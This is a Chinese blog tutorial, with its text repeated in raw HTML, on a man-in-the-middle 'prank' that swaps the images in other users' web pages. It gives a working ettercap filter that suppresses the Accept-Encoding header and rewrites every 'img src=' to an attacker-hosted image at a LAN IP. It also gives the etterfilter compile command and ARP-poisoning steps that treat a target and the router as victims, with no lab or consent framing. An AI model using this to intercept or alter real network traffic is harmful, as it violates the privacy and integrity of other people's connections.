中间人恶搞替换图片

博主： literature
发布时间：2018 年 05 月 27 日
125 次浏览
关闭评论
749字数
分类：主机教程

一：先准备一张图片

恩恩！低调点好！
我们将图片放大kali的var/www/html目录下

二:启动Apache

servce apache2 start

三：编写攻击脚本

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
#note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}

然后另存为alert.filter文件

四：将alert.filter转变为二进制文件

etterfilter alert.filter -o alert.ef

五：利用ettercap进行中间人攻击

将目标添加为1 路由器自身添加为2

然后我们载入刚才生成的脚本

然后开始中间人攻击

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/219.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

最后修改：2023 年 08 月 04 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

此处评论已关闭

中间人恶搞替换图片

literature • 2018 年 05 月 27 日

<h3>一：先准备一张图片</h3><p><img src="https://bbskali.cn/data/attachment/forum/201805/27/182503p3tl993i9uditnwt.jpg" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""></p><p>恩恩！低调点好！<br />我们将图片放大kali的<code>var/www/html</code>目录下</p><h3>二:启动Apache</h3><pre><code class="lang-shell">servce apache2 start</code></pre><p><img src="https://bbskali.cn/data/attachment/forum/201805/27/183718ec6hlv1z4bj1h3x4.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""></p><p>三：编写攻击脚本</p><pre><code class="lang-shell">if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
#note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}</code></pre><p>然后另存为<code>alert.filter</code>文件</p><h3>四：将alert.filter转变为二进制文件</h3><pre><code class="lang-shell">etterfilter alert.filter -o alert.ef</code></pre><p><img src="https://bbskali.cn/data/attachment/forum/201805/27/184219omxerhnd3zxr3n3j.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""></p><h3>五：利用ettercap进行中间人攻击</h3><p>将目标添加为1 路由器自身添加为2<br /><img src="https://bbskali.cn/data/attachment/forum/201805/27/184437kb68ozdfudsuccrc.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""><br />然后我们载入刚才生成的脚本<br /><img src="https://bbskali.cn/data/attachment/forum/201805/27/184547pn66nn64i14n15f8.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""><br />然后开始中间人攻击<br /><img src="https://bbskali.cn/data/attachment/forum/201805/27/221431m5g0sxgtgvr8rxts.png" alt="请输入图片描述" title="请输入图片描述" style="" class="aligncenter"style=""></p><p><hr class="content-copyright" style="margin-top:50px"></p><div class="post-copyright" style="font-style:normal"><p class="iconfont-copyright"><i class="glyphicon glyphicon-copyright-mark"></i></p><p class="content-copyright">版权属于：逍遥子大表哥</p><p class="content-copyright">本文链接：https://blog.bbskali.cn/219.html</p><p class="content-copyright">按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。</p></div>